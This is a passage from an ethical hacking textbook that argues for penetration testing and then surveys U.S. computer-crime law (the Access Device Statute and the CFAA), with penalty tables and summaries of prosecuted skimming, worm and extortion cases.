carry out different types of attacks, which allow the team to see how the perimeter de- 
vices will react in certain circumstances. 

Nothing should be trusted until it is tested. There is an amazing number of cases 
where a company does everything seemingly correct when it comes to their infrastruc- 
ture security. They implement policies and procedures, roll out firewalls, IDS, and anti- 
virus, have all of their employees attend security awareness training, and continually 
patch their systems. It is unfortunate that these companies put forth all the right effort 
and funds only to end up on CNN as the latest victim because all of their customers' 
credit card numbers were stolen and posted on the Internet. And this can happen if 
they do not carry out the necessary vulnerability and penetration tests. 

Recognizing Trouble When It Happens 

Network administrators, engineers, and security professionals need to be able to recog- 
nize when an attack is underway or when one is about to take place. It may seem as 
though recognizing an attack as it is happening should be easy. This is only true for the 
very "noisy" or overwhelming attacks such as denial-of-service (DoS) attacks. Many at- 
tackers fly under the radar and go unnoticed by security devices and staff members. It 
is important to know how different types of attacks take place so they can be properly 
recognized and stopped. 

Security issues and compromises are not going to go away any time soon. People 
who work in positions within corporations that touch security in any way should not 
try to ignore it or treat security as though it is an island unto itself. The bad guys know 
that to hurt an enemy is to take out what that victim depends upon most. Today the 
world is only becoming more dependent upon technology, not less. Even though ap- 
plication development and network and system configuration and maintenance are 
complex, security is only going to become more entwined with them. When a network 
staff has a certain level of understanding of security issues and how different compro- 
mises take place, they can act more effectively and efficiently when the "all hands on 
deck" alarm is sounded. 

It is also important to know when an attack may be around the corner. If network 
staff is educated on attacker techniques and they see a ping sweep followed a day later 
by a port scan, they will know that most likely in three hours their systems will be at- 
tacked. There are many activities that lead up to different attacks, so understanding 
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these items will help the company protect itself. The argument can be made that we 
have more automated security products that identify these types of activities so that we 
don't have to see them coming. But depending upon software that does not have the 
ability to put the activities in the necessary context and make a decision is very danger- 
ous. Computers can outperform any human on calculations and performing repetitive 
tasks, but we still have the ability to make some necessary judgment calls because we 
understand the grays in life and do not just see things in Is and Os. 

So it is important to understand that hacking tools are really just software tools that 
carry out some specific type of procedure to achieve a desired result. The tools can be 
used for good (defensive) purposes or for bad (offensive) purposes. The good and the 
bad guys use the same exact toolset; the difference is their intent when operating these 
utilities. It is imperative for the security professional to understand how to use these 
tools and how attacks are carried out if he is going to be of any use to his customer and 
to the industry. 

Emulating the Attack 

Once network administrators, engineers, and security professionals understand how 
attackers work, then they can emulate their activities to carry out a useful penetration 
test. But why would anyone want to emulate an attack? Because this is the only way to 
truly test an environment's security level — you must know how it will react when a real 
attack is being carried out. 

This book is laid out to walk you through these different steps so you can under- 
stand how many types of attacks take place. It can help you develop methodologies for 
emulating similar activities to test your company's security posture. 

There are already many elementary ethical hacking books available in every book- 
store. The demand for these books and hacking courses over the years has reflected the 
interest and the need in the market. It is also obvious that, although some people are 
just entering this sector, many individuals are ready to move on to the more advanced 
topic of ethical hacking. The goal of this book is to go through some of the basic ethical 
hacking concepts quickly and then spend more time with the concepts that are not 
readily available to you, but are unbelievably important. 

Just in case you choose to use the information in this book for unintended pur- 
poses (malicious activity), in the next chapters, we will also walk through several fed- 
eral laws that have been put into place to scare you away from this activity. A wide range 
of computer crimes are taken seriously by today's court system, and attackers are receiv- 
ing hefty fines and jail sentences for their activities. Don't let that be you. There is just 
as much fun and intellectual stimulation to be had working as a white hat — and no 
threat of jail time! 

Where Do Attackers Have Most of Their Fun? 

Hacking into a system and environment is almost always carried out by exploiting vulner- 
abilities in software. Only recently has the light started to shine on the root of the prob- 
lem of successful attacks and exploits, which is flaws within software code. Most attack 
methods described in this book can be carried out because of errors in the software. 
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It is not fair to put all of the blame on the programmers, because they have done 
exactly what their employers and market have asked them to: quickly build applica- 
tions with tremendous functionality. Only over the last few years has the market started 
screaming for functionality and security and the vendors and programmers are scram- 
bling to meet these new requirements and still stay profitable. 

Security Does Not Like Complexity 

Software, in general, is very complicated, and the more functionality that we try to 
shove into applications and operating systems, the more complex software will be- 
come. The more complex software gets, the harder it is to predict properly how it will 
react in all possible scenarios, which makes it much harder to secure. 

Today's operating systems and applications are increasing in lines of code (LOC). 
Windows operating systems have approximately 40 million LOC. Unix and Linux op- 
erating systems have much less, usually around 2 million LOC. A common estimate 
used in the industry is that there are between 5-50 bugs per 1,000 lines of code. So a 
middle of the road estimate would be that Windows 7 has approximately 1,200,000 
bugs. (Not a statement of fact; just a guesstimation.) 

It is difficult enough to try to logically understand and secure 40 million LOC, but 
the complexity does not stop there. The programming industry has evolved from tradi- 
tional programming languages to object-oriented languages, which allow for a modu- 
lar approach to developing software. This approach has a lot of benefits: reusable 
components, faster to market times, decrease in programming time, and easier ways to 
troubleshoot and update individual modules within the software. But applications and 
operating systems use each other's components, users download different types of mo- 
bile code to extend functionality, DLLs are installed and shared, and instead of applica- 
tion-to-operating system communication, today many applications communicate 
directly with each other. The operating system cannot control this type of information 
flow and provide protection against possible compromises. 

If we peek under the covers even further, we see that thousands of protocols are 
integrated into the different operating system protocol stacks, which allows for distrib- 
uted computing. The operating systems and applications must rely on these protocols 
for transmission to another system or application, even if the protocols contain their 
own inherent security flaws. Device drivers are developed by different vendors and in- 
stalled in the operating system. Many times these drivers are not well developed and 
can negatively affect the stability of an operating system. And to get even closer to the 
hardware level, injection of malicious code into firmware is an up-and-coming attack 
avenue. 

So is it all doom and gloom? Yep, for now. Until we understand that a majority of 
the successful attacks are carried out because software vendors do not integrate security 
into the design and specification phases, our programmers have not been properly 
taught how to code securely, vendors are not being held liable for faulty code, and con- 
sumers are not willing to pay more for properly developed and tested code, our stagger- 
ing hacking and company compromise statistics will only increase. 
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Will it get worse before it gets better? Probably. Every industry in the world is be- 
coming more reliant on software and technology. Software vendors have to carry out 
the continual one-upmanship to ensure their survivability in the market. Although se- 
curity is becoming more of an issue, functionality of software has always been the main 
driving component of products, and it always will be. Attacks will also continue and 
increase in sophistication because they are now revenue streams for individuals, com- 
panies, and organized crime groups. 

Will vendors integrate better security, ensure their programmers are properly trained 
in secure coding practices, and put each product through more and more testing cycles? 
Not until they have to. Once the market truly demands that this level of protection and 
security is provided by software products and customers are willing to pay more for 
security, then the vendors will step up to the plate. Currently, most vendors are only 
integrating protection mechanisms because of the backlash and demand from their 
customer bases. Unfortunately, just as September 11th awakened the United States to its 
vulnerabilities, something large may have to take place in terms of software compro- 
mise before the industry decides to address this issue properly. 

So we are back to the original question: what does this have to do with ethical hack- 
ing? A novice ethical hacker will use tools developed by others who have uncovered 
specific vulnerabilities and methods to exploit them. A more advanced ethical hacker 
will not just depend upon other people's tools, she will have the skill set and under- 
standing to look at the code itself. The more advanced ethical hacker will be able to 
identify possible vulnerabilities and programming code errors and develop ways to rid 
the software of these types of flaws. 

ff the software did not contain 5-50 exploitable bugs within every 1,000 lines of 
code, we would not have to build the fortresses we are constructing today. Use this book 
as a guide to bring you deeper and deeper under the covers to allow you to truly under- 
stand where the security vulnerabilities reside and what should be done about them. 
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CHAPTER 



Ethical Hacking and the 
Legal System 



We currently live in a very interesting time. Information security and the legal system 
are being slammed together in a way that is straining the resources of both systems. The 
information security world uses terms like "bits," "packets," and "bandwidth," and the 
legal community uses words like "jurisdiction," "liability," and "statutory interpreta- 
tion." In the past, these two very different sectors had their own focus, goals, and pro- 
cedures and did not collide with one another. But, as computers have become the new 
tools for doing business and for committing traditional and new crimes, the two worlds 
have had to independently approach and then interact in a new space — a space now 
sometimes referred to as cyberlaw. 

In this chapter, we'll delve into some of the major categories of laws relating to cy- 
bercrime and list the technicalities associated with each individual law. In addition, 
we'll document recent real-world examples to better demonstrate how the laws were 
created and have evolved over the years. We'll discuss malware and various insider 
threats that companies face today, the mechanisms used to enforce relevant laws, and 
federal and state laws and their application. 

We'll cover the following topics: 

• The rise of cyberlaw 

• Understanding individual cyberlaws 

The Rise of Cyberlaw 

Today's CEOs and management not only need to worry about profit margins, market 
analysis, and mergers and acquisitions; now they also need to step into a world of 
practicing security with due care, understanding and complying with new government 
privacy and information security regulations, risking civil and criminal liability for 
security failures (including the possibility of being held personally liable for certain 
security breaches), and trying to comprehend and address the myriad of ways in which 
information security problems can affect their companies. Business managers must 
develop at least a passing familiarity with the technical, systemic, and physical ele- 
ments of information security. They also need to become sufficiently well-versed in 
relevant legal and regulatory requirements to address the competitive pressures and 
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consumer expectations associated with privacy and security that affect decision mak- 
ing in the information security area — a large and ever-growing area of our economy. 

Just as businesspeople must increasingly turn to security professionals for advice in 
seeking to protect their company's assets, operations, and infrastructure, so, too, must 
they turn to legal professionals for assistance in navigating the changing legal land- 
scape in the privacy and information security area. Legislators, governmental and pri- 
vate information security organizations, and law enforcement professionals are 
constantly updating laws and related investigative techniques in an effort to counter 
each new and emerging form of attack and technique that the bad guys come up with. 
This means security technology developers and other professionals are constantly try- 
ing to outsmart sophisticated attackers, and vice versa. In this context, the laws being 
enacted provide an accumulated and constantly evolving set of rules that attempts to 
stay in step with new types of crimes and how they are carried out. 

Compounding the challenge for business is the fact that the information security 
situation is not static; it is highly fluid and will remain so for the foreseeable future. 
Networks are increasingly porous to accommodate the wide range of access points need- 
ed to conduct business. These and other new technologies are also giving rise to new 
transaction structures and ways of doing business. All of these changes challenge the 
existing rules and laws that seek to govern such transactions. Like business leaders, those 
involved in the legal system, including attorneys, legislators, government regulators, 
judges, and others, also need to be properly versed in developing laws and in customer 
and supplier product and service expectations that drive the quickening evolution of 
new ways of transacting business — all of which can be captured in the term cyberlmv. 

Cyberlaw is a broad term encompassing many elements of the legal structure that 
are associated with this rapidly evolving area. The increasing prominence of cyberlaw is 
not surprising if you consider that the first daily act of millions of American workers is 
to turn on their computers (frequently after they have already made ample use of their 
other Internet access devices and cell phones). These acts are innocuous to most people 
who have become accustomed to easy and robust connections to the Internet and oth- 
er networks as a regular part of life. But this ease of access also results in business risk, 
since network openness can also enable unauthorized access to networks, computers, 
and data, including access that violates various laws, some of which we briefly describe 
in this chapter. 

Cyberlaw touches on many elements of business, including how a company con- 
tracts and interacts with its suppliers and customers, sets policies for employees han- 
dling data and accessing company systems, uses computers to comply with government 
regulations and programs, and so on. A very important subset of these laws is the group 
of laws directed at preventing and punishing unauthorized access to computer net- 
works and data. This chapter focuses on the most significant of these laws. 

Security professionals should be familiar with these laws, since they are expected to 
work in the construct the laws provide. A misunderstanding of these ever-evolving laws, 
which is certainly possible given the complexity of computer crimes, can, in the ex- 
treme case, result in the innocent being prosecuted or the guilty remaining free. And 
usually it is the guilty ones who get to remain free. 
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Understanding Individual Cyberlaws 

Many countries, particularly those whose economies have more fully integrated com- 
puting and telecommunications technologies, are struggling to develop laws and rules 
for dealing with computer crimes. We will cover selected U.S. federal computer-crime 
laws in order to provide a sample of these many initiatives; a great deal of detail regard- 
ing these laws is omitted and numerous laws are not covered. This chapter is not in- 
tended to provide a thorough treatment of each of these laws, or to cover any more than 
the tip of the iceberg of the many U.S. technology laws. Instead, it is meant to raise 
awareness of the importance of considering these laws in your work and activities as an 
information security professional. That in no way means that the rest of the world is al- 
lowing attackers to run free and wild. With just a finite number of pages, we cannot 
properly cover all legal systems in the world or all of the relevant laws in the United 
States. It is important that you spend the time necessary to fully understand the laws that 
are relevant to your specific location and activities in the information security area. 

The following sections survey some of the many U.S. federal computer crime stat- 
utes, including: 

• 18 USC 1029: Fraud and Related Activity in Connection with Access Devices 

• 18 USC 1030: Fraud and Related Activity in Connection with Computers 

• 18 USC 2510 et seq.: Wire and Electronic Communications Interception and 
Interception of Oral Communications 

• 18 USC 2701 et seq.: Stored Wire and Electronic Communications and 
Transactional Records Access 

• The Digital Millennium Copyright Act 

• The Cyber Security Enhancement Act of 2002 

• Securely Protect Yourself against Cyber Trespass Act 

18 USC Section 1 029: The Access Device Statute 

The purpose of the Access Device Statute is to curb unauthorized access to accounts; 
theft of money, products, and services; and similar crimes. It does so by criminalizing 
the possession, use, or trafficking of counterfeit or unauthorized access devices or de- 
vice-making equipment, and other similar activities (described shortly), to prepare for, 
facilitate, or engage in unauthorized access to money, goods, and services. It defines 
and establishes penalties for fraud and illegal activity that can take place through the 
use of such counterfeit access devices. 

The elements of a crime are generally the things that need to be shown in order for 
someone to be prosecuted for that crime. These elements include consideration of the 
potentially illegal activity in light of the precise definitions of "access device, " "counter- 
feit access device," "unauthorized access device," "scanning receiver," and other defini- 
tions that together help to define the scope of the statute's application. 
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The term "access device" refers to a type of application or piece of hardware that is 
created specifically to generate access credentials (passwords, credit card numbers, 
long-distance telephone service access codes, PINs, and so on) for the purpose of unau- 
thorized access. Specifically, it is defined broadly to mean: 

...any card, plate, code, account number, electronic serial number, 
mobile identification number, personal identification number, or other 
telecommunications service, equipment, or instrument identifier, or other 
means of account access that can be used, alone or in conjunction with another 
access device, to obtain money, goods, services, or any other thing of value, or 
that can be used to initiate a transfer of funds (other than a transfer originated 
solely by paper instrument). 

For example, phreakers (telephone system attackers) use a software tool to generate 
a long list of telephone service codes so they can acquire free long-distance services and 
sell these services to others. The telephone service codes that they generate would be 
considered to be within the definition of an access device, since they are codes or elec- 
tronic serial numbers that can be used, alone or in conjunction with another access 
device, to obtain services. They would be counterfeit access devices to the extent that the 
software tool generated false numbers that were counterfeit, fictitious, or forged. Fi- 
nally, a crime would occur with each undertaking of the activities of producing, using, 
or selling these codes, since the Access Device Statute is violated by whoever "know- 
ingly and with intent to defraud, produces, uses, or traffics in one or more counterfeit 
access devices." 

Another example of an activity that violates the Access Device Statute is the activity 
of crackers, who use password dictionaries to generate thousands of possible passwords 
that users may be using to protect their assets. 

"Access device" also refers to the actual credential itself. If an attacker obtains a pass- 
word, credit card number, or bank PIN, or if a thief steals a calling-card number, and this 
value is used to access an account or obtain a product or service or to access a network 
or a file server, it would be considered a violation of the Access Device Statute. 

A common method that attackers use when trying to figure out what credit card 
numbers merchants will accept is to use an automated tool that generates random sets 
of potentially usable credit card values. Two tools (easily obtainable on the Internet) 
that generate large volumes of credit card numbers are Credit Master and Credit Wiz- 
ard. The attackers submit these generated values to retailers and others with the goal of 
fraudulently obtaining services or goods. If the credit card value is accepted, the at- 
tacker knows that this is a valid number, which they then continue to use (or sell for 
use) until the activity is stopped through the standard fraud protection and notification 
systems that are employed by credit card companies, retailers, and banks. Because this 
attack type has worked so well in the past, many merchants now require users to enter 
a unique card identifier when making online purchases. This identifier is the three- 
digit number located on the back of the card that is unique to each physical credit card 
(not just unique to the account). Guessing a 16-digit credit card number is challenging 
enough, but factoring in another three-digit identifier makes the task much more dif- 
ficult without having the card in hand. 
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Another example of an access device crime is skimming. Two Bulgarian men stole 
account information from more than 200 victims in the Atlanta area with an ATM 
skimming device. They were convicted and sentenced to four and a half years in federal 
prison in 2009. The device they used took an electronic recording of the customer's 
debit card number as well as a camera recording of the keypad as the password was 
entered. The two hackers downloaded the information they gathered and sent it over- 
seas — and then used the account information to load stolen gift cards. 

A 2009 case involved eight waiters who skimmed more than $700,000 from Wash- 
ington, D.C.-area restaurant diners. The ringleaders of the scam paid waiters to use a 
handheld device to steal customer credit card numbers. The hackers then slid their own 
credit cards through a device that encoded stolen card numbers onto their cards' mag- 
netic strips. They made thousands of purchases with the stolen card numbers. The Se- 
cret Service, which is heavily involved with investigating Access Device Statute violations, 
tracked the transactions back to the restaurants. 

New skimming scams use gas station credit card readers to get information. In a 
North Carolina case, two men were arrested after allegedly attaching electronic skim- 
ming devices to the inside of gas pumps to steal bank card numbers. The device was 
hidden inside gas pumps, and the cards' corresponding PINs were stolen using hidden 
video cameras. The defendants are thought to have then created new cards with the 
stolen data. A case in Utah in 2010 involved about 180 gas stations being attacked. In 
some cases, a wireless connection sends the stolen data back to hackers so they don't 
have to return to the pump to collect the information. 

Table 2-1 outlines the crime types addressed in section 1029 and their correspond- 
ing punishments. These offenses must be committed knowingly and with intent to 
defraud for them to be considered federal crimes. 



Crime 


Penalty 


Example 


Producing, using, or 
trafficking in one or more 
counterfeit access devices 


Fine of $50,000 or twice the 
value of the crime and/or up to 
1 0 years in prison, $ 1 00,000 and / 
or up to 20 years in prison if 
repeat offense 


Creating or using a 
software tool to generate 
credit card numbers 


Using or obtaining an access 
device to gain unauthorized 
access and obtain anything 
of value totaling $ 1 ,000 or 
more during a one-year 
period 


Fine of $ 1 0,000 or twice the 
value of the crime and/or up to 
1 0 years in prison, $ 1 00,000 and / 
or up to 20 years in prison if 
repeat offense 


Using a tool to capture 
credentials and using the 
credentials to break into 
the Pepsi-Cola network, for 
instance, and stealing their 
soda recipe 


Possessing 1 5 or more 
counterfeit or unauthorized 
access devices 


Fine of $ 1 0,000 or twice the 
value of the crime and/or up to 
1 0 years in prison, $ 1 00,000 and/ 
or up to 20 years in prison if 
repeat offense 


Hacking into a database and 
obtaining 15 or more credit 
card numbers 



Table 2-1 Access Device Statute Laws 
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Crime 


Penalty 


Example 


Producing, trafficking, having 
control or possession of 
device-making equipment 


Fine of $50,000 or twice the 
value of the crime and/or up to 
1 5 years in prison, $ 1 ,000,000 
and/or up to 20 years in prison if 
repeat offense 


Creating, having, or selling 
devices to obtain user 
credentials illegally for the 
purpose of fraud 


Effecting transactions with 
access devices issued to 
another person in order to 
receive payment or other 
things of value totaling 
$ 1 ,000 or more during a 
one-year period 


Fine of $ 1 0,000 or twice the 
value of the crime and/or up to 
1 5 years in prison, $ 1 00,000 and/ 
or up to 20 years in prison if 
repeat offense 


Setting up a bogus website 
and accepting credit card 
numbers for products or 
service that do not exist 


Soliciting a person for the 
purpose of offering an 
access device or selling 
information regarding how 
to obtain an access device 


Fine of $50,000 or twice the 
value of the crime and/or up to 
1 0 years in prison, $ 1 00,000 and/ 
or up to 20 years in prison if 
repeat offense 


A person obtains advance 
payment for a credit card 
and does not deliver that 
credit card 


Using, producing, 
trafficking in, or having 
a telecommunications 
instrument that has been 
modified or altered to 
obtain unauthorized use of 
telecommunications services 


Fine of $50,000 or twice the 
value of the crime and/or up to 
1 0 years in prison, $ 1 00,000 and/ 
or up to 20 years in prison if 
repeat offense 


Cloning cell phones and 
reselling them or employing 
them for personal use 


Using, producing, trafficking 
in, or having custody or 
control of a scanning 
receiver 


Fine of $50,000 or twice the 
value of the crime and/or up to 
1 5 years in prison, $ 1 00,000 and/ 
or up to 20 years in prison if 
repeat offense 


Scanners used to intercept 
electronic communication 
to obtain electronic 
serial numbers, or mobile 
identification numbers 
for cell phone recloning 
purposes 


Producing, trafficking, 
having control or custody 
of hardware or software 
used to alter or modify 
telecommunications 
instruments to obtain 
unauthorized access to 
telecommunications services 


Fine of $ 1 0,000 or twice the 
value of the crime and/or up to 
1 0 years in prison, $ 1 00,000 and/ 
or up to 20 years in prison if 
repeat offense 


Using and selling tools that 
can reconfigure cell phones 
for fraudulent activities, or 
PBX telephone fraud and 
different phreaker boxing 
techniques to obtain free 
telecommunication service 


Causing or arranging for 
a person to present to a 
credit card system member 
or its agent for payment 
records of transactions 
made by an access device 


Fine of $ 1 0,000 or twice the 
value of the crime and/or up to 
1 0 years in prison, $ 1 00,000 and/ 
or up to 20 years in prison if 
repeat offense 


Creating phony credit card 
transactions records to 
obtain products or refunds 



Table 2-1 Access Device Statute Laws (continued) 
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A further example of a crime that can be punished under the Access Device Statute 
is the creation of a website or the sending of e-mail "blasts" that offer false or fictitious 
products or services in an effort to capture credit card information, such as products 
that promise to enhance one's sex life in return for a credit card charge of $19.99. (The 
snake oil miracle workers who once had wooden stands filled with mysterious liquids 
and herbs next to dusty backcountry roads now have the power of the Internet to hawk 
their wares.) These phony websites capture the submitted credit card numbers and use 
the information to purchase the staples of hackers everywhere: pizza, portable game 
devices, and, of course, additional resources to build other malicious websites. 

Because the Internet allows for such a high degree of anonymity, these criminals 
are generally not caught or successfully prosecuted. As our dependency upon technol- 
ogy increases and society becomes more comfortable with carrying out an increas- 
ingly broad range of transactions electronically, such threats will only become more 
prevalent. Many of these statutes, including Section 1029, seek to curb illegal activi- 
ties that cannot be successfully fought with just technology alone. So basically you 
need several tools in your bag of tricks to fight the bad guys — technology, knowledge 
of how to use the technology, and the legal system. The legal system will play the role 
of a sledgehammer to the head, which attackers will have to endure when crossing 
these boundaries. 

Section 1029 addresses offenses that involve generating or illegally obtaining access 
credentials, which can involve just obtaining the credentials or obtaining and using 
them. These activities are considered criminal whether or not a computer is involved — 
unlike the statute discussed next, which pertains to crimes dealing specifically with 
computers. 



18 USC Section 1030 of the Computer Fraud 
and Abuse Act 

The Computer Fraud and Abuse Act (CFAA) (as amended by the USA Patriot Act) is an 
important federal law that addresses acts that compromise computer network security. 
It prohibits unauthorized access to computers and network systems, extortion through 
threats of such attacks, the transmission of code or programs that cause damage to 
computers, and other related actions. It addresses unauthorized access to government, 
financial institutions, and other computer and network systems, and provides for civil 
and criminal penalties for violators. The act outlines the jurisdiction of the FBI and 
Secret Service. 

Table 2-2 outlines the categories of crimes that section 1030 of the CFAA addresses. 
These offenses must be committed knowingly by accessing a computer without autho- 
rization or by exceeding authorized access. You can be held liable under the CFAA if 
you knowingly accessed a computer system without authorization and caused harm, 
even if you did not know that your actions might cause harm. 
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Crime 


Punishment 


Example 


Acquiring national defense, 
foreign relations, or restricted 
atomic energy information 
with the intent or reason to 
believe that the information 
can be used to injure the U.S. 
or to the advantage of any 
foreign nation. 


Fine and/or up to 1 year 
in prison, up to 10 years in 
prison if repeat offense. 


Hacking into a government 
computer to obtain classified 
data. 


Obtaining information in 
a financial record from a 
financial institution or a card 
issuer, or information on a 
consumer in a file from a 


Fine and/or up to 1 year 
in prison, up to 10 years in 
prison if repeat offense. 


Breaking into a computer to 
obtain another person’s credit 
information. 


consumer reporting agency. 
Obtaining information from 
any department or agency 
of the U.S. or protected 
computer involved in 
interstate and foreign 
communication. 






Affecting a computer 
exclusively for the use of a 
U.S. government department 
or agency or, if it is not 
exclusive, one used for the 
government where the 
offense adversely affects 
the use of the government's 
operation of the computer. 


Fine and/or up to 1 year 
in prison, up to 10 years in 
prison if repeat offense. 


Makes it a federal crime 
to violate the integrity of a 
system, even if information is 
not gathered. One example is 
carrying out denial-of-service 
attacks against government 
agencies. 


Furthering a fraud by 
accessing a federal interest 
computer and obtaining 
anything of value, unless the 
fraud and the thing obtained 
consists only of the use of the 
computer and the use is not 
more than $5,000 in a one- 
year period. 


Fine and/or up to 5 years 
in prison, up to 10 years in 
prison if repeat offense. 


Breaking into a powerful 
system and using its processing 
power to run a password- 
cracking application. 



Table 2-2 Computer Fraud and Abuse Act Laws 



The term "protected computer," as commonly put forth in the CFAA, means a com- 
puter used by the U.S. government, financial institutions, or any system used in inter- 
state or foreign commerce or communications. The CFAA is the most widely referenced 
statute in the prosecution of many types of computer crimes. A casual reading of the 
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Crime 


Punishment 


Example 


Employing a computer used 
in interstate commerce 
and knowingly causing the 
transmission of a program, 
information, code, or 
command to a protected 
computer that results in 
damage or the victim suffering 
some type of loss. 


Penalty with intent to harm: 
Fine and/or up to 5 years 
in prison, up to 10 years 
in prison if repeat offense. 
Penalty for acting with 
reckless disregard: Fine and/ 
or up to 1 year in prison. 


Intentional: Disgruntled 
employee uses his access 
to delete a whole database. 
Reckless disregard: Hacking 
into a system and accidentally 
causing damage (or if the 
prosecution cannot prove 
that the attacker’s intent was 
malicious). 


Furthering a fraud by 
trafficking in passwords 
or similar information 
that will allow a computer 
to be accessed without 
authorization, if the trafficking 
affects interstate or foreign 
commerce or if the computer 
affected is used by or for the 
government. 


Fine and/or up to 1 year 
in prison, up to 10 years in 
prison if repeat offense. 


After breaking into a 
government computer, 
obtaining user credentials 
and selling them. 


With intent to extort from 
any person any money 
or other thing of value, 
transmitting in interstate 
or foreign commerce any 
communication containing any 
threat to cause damage to a 
protected computer. 


$250,000 fine and 10 years 
in prison for first offense, 
$250,000 and 20 years 
in prison for subsequent 
offenses. 


Encrypting all data on a 
government hard drive and 
demanding money to then 
decrypt the data. 



Table 2-2 Computer Fraud and Abuse Act Laws (continued) 



CFAA suggests that it only addresses computers used by government agencies and fi- 
nancial institutions, but there is a small (but important) clause that extends its reach. 
This clause says that the law applies also to any system "used in interstate or foreign 
commerce or communication." The meaning of "used in interstate or foreign com- 
merce or communication" is very broad, and, as a result, CFAA operates to protect 
nearly all computers and networks. Almost every computer connected to a network or 
the Internet is used for some type of commerce or communication, so this small clause 
pulls nearly all computers and their uses under the protective umbrella of the CFAA. 
Amendments by the USA Patriot Act to the term "protected computer" under CFAA 
extended the definition to any computers located outside the United States, as long as 
they affect interstate or foreign commerce or communication of the United States. So if 
the United States can get the attackers, they will attempt to prosecute them no matter 
where in the world they live. 
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The CFAA has been used to prosecute many people for various crimes. Two types 
of unauthorized access can be prosecuted under the CFAA: These include wholly un- 
authorized access by outsiders, and also situations where individuals, such as employ- 
ees, contractors, and others with permission, exceed their authorized access and 
commit crimes. The CFAA states that if someone accesses a computer in an unauthor- 
ized manner or exceeds his or her access rights, that individual can be found guilty of 
a federal crime. This clause allows companies to prosecute employees who carry out 
fraudulent activities by abusing (and exceeding) the access rights their company has 
given them. 

Many IT professionals and security professionals have relatively unlimited access 
rights to networks due to their job requirements. However, just because an individual 
is given access to the accounting database, doesn't mean she has the right to exceed that 
authorized access and exploit it for personal purposes. The CFAA could apply in these 
cases to prosecute even trusted, credentialed employees who performed such mis- 
deeds. 

Under the CFAA, the FBI and the Secret Service have the responsibility for han- 
dling these types of crimes and they have their own jurisdictions. The FBI is respon- 
sible for cases dealing with national security, financial institutions, and organized 
crime. The Secret Service's jurisdiction encompasses any crimes pertaining to the 
Treasury Department and any other computer crime that does not fall within the 
FBI's jurisdiction. 




NOTE The Secret Service’s jurisdiction and responsibilities have grown since 
the Department of Homeland Security (DHS) was established. The Secret 
Service now deals with several areas to protect the nation and has established 
an Information Analysis and Infrastructure Protection division to coordinate 
activities in this area.This division’s responsibilities encompasses the 
preventive procedures for protecting “critical infrastructure,” which include 
such things as power grids, water supplies, and nuclear plants in addition to 
computer systems. 



Hackers working to crack government agencies and programs seem to be working 
on an ever-bigger scale. The Pentagon's Joint Strike Fighter Project was breached in 
2009, according to a Wall Street Journal report. Intruders broke into the $300 billion 
project to steal a large amount of data related to electronics, performance, and design 
systems. The stolen information could make it easier for enemies to defend against 
fighter jets. The hackers also used encryption when they stole data, making it harder for 
Pentagon officials to determine what exactly was taken. However, much of the sensitive 
program-related information wasn't stored on Internet-connected computers, so hack- 
ers weren't able to access that information. Several contractors are involved in the fight- 
er jet program, however, opening up more networks and potential vulnerabilities for 
hackers to exploit. 
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An example of an attack that does not involve government agencies but instead 
simply represents an exploit in interstate commerce involved online ticket purchase 
websites. Three ticketing system hackers made more than $25 million and were in- 
dicted in 2010 for CFAA violations, among other charges. The defendants are thought 
to have gotten prime tickets for concerts and sporting events across the U.S., with help 
from Bulgarian computer programmers. One important strategy was using CAPTCHA 
hots, a network of computers that let the hackers evade the anti-hacking CAPTCHA tool 
found on most ticketing websites. They could then buy tickets much more quickly than 
the general public. In addition, the hackers are alleged to have used fake websites and 
e-mail addresses to conceal their activities. 

Worms and Viruses and the CFAA 

The spread of computer viruses and worms seems to be a common occurrence during 
many individuals' and corporations' daily activities. A big reason for the increase in vi- 
ruses and worms is that the Internet continues to grow at an unbelievable pace, provid- 
ing attackers with new victims to exploit every day. Malware is becoming more sophisti- 
cated, and a record number of home users run insecure systems, which is just a welcome 
mat to one and all hackers. Individuals who develop and release this type of malware 
can be prosecuted under section 1030, along with various state statutes. The CFAA crim- 
inalizes the act of knowingly causing the transmission of a program, information, code, 
or command, without authorized access to the protected computer, that results in inten- 
tional damage. 

In 2009, a federal grand jury indicted a hacker on charges that he transmitted mali- 
cious script to servers at Fannie Mae, the government-sponsored mortgage lender. As an 
employee, the defendant had access to all of Fannie Mae's U.S. servers. After the hacker 
(a contract worker) was let go from Fannie Mae, he inserted code designed to move 
through 4,000 servers and destroy all data. Though the malicious script was hidden, 
another engineer discovered the script before it could execute. 

In U.S. vs. Mettenbrink, a Nebraska hacker pled guilty in 2010 to an attack on the 
Church of Scientology websites. As part of the "Anonymous" group, which protests 
Scientology, the hacker downloaded software to carry out a DDoS attack. The attack 
shut down all of the church's websites. The defendant was sentenced to a year in prison. 
The maximum penalty for the case, filed as violating Title 18 USC 1030(a)(5)(A)(i), is 
ten years in prison and a fine of $250,000. 

Blaster Worm Attacks and the CFAA 

Virus outbreaks have definitely caught the attention of the American press and the gov- 
ernment. Because viruses can spread so quickly, and their impact grow exponentially, 
serious countermeasures have been developed. The Blaster worm is a well-known worm 
that has impacted the computing industry. In Minnesota, an individual was brought to 
justice under the CFAA for issuing a B variant of the worm that infected 7,000 users. 
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Those users' computers were unknowingly transformed into drones that then attempt- 
ed to attack a Microsoft website. Although the Blaster worm is an old example of an 
instance of malware, it gained the attention of high-ranking government and law en- 
forcement officials. 

Addressing the seriousness of the crimes, then-Attorney General John Ashcroft 
stated, 

The Blaster computer worm and its variants wreaked havoc on the Internet, and 
cost businesses and computer users substantial time and money. Cyber hacking 
is not joy riding. Hacking disrupts lives and victimizes innocent people across the 
nation. The Department of Justice takes these crimes very seriously, and we will 
devote every resource possible to tracking down those who seek to attack our 
technological infrastructure. 

So, there you go, do bad deeds and get the legal sledgehammer to the head. Sadly, how- 
ever, many of these attackers are never found and prosecuted because of the difficulty 
of investigating digital crimes. 

The Minnesota Blaster case was a success story in the eyes of the FBI, Secret Service, 
and law enforcement agencies, as collectively they brought a hacker to justice before 
major damage occurred. "This case is a good example of how effectively and quickly 
law enforcement and prosecutors can work together and cooperate on a national level," 
commented U.S. District Attorney Tom Heffelfinger. 

The FBI added its comments on the issue as well. Jana Monroe, FBI assistant direc- 
tor, Cyber Division, stated, "Malicious code like Blaster can cause millions of dollars' 
worth of damage and can even jeopardize human life if certain computer systems are 
infected. That is why we are spending a lot of time and effort investigating these cases." 
In response to this and other types of computer crime, the FBI has identified investigat- 
ing cybercrime as one of its top three priorities, just behind counterterrorism and coun- 
terintelligence investigations. 

Other prosecutions under the CFAA include a case brought against a defendant who 
tried to use "cyber extortion" against insurance company New York Life, threatening to 
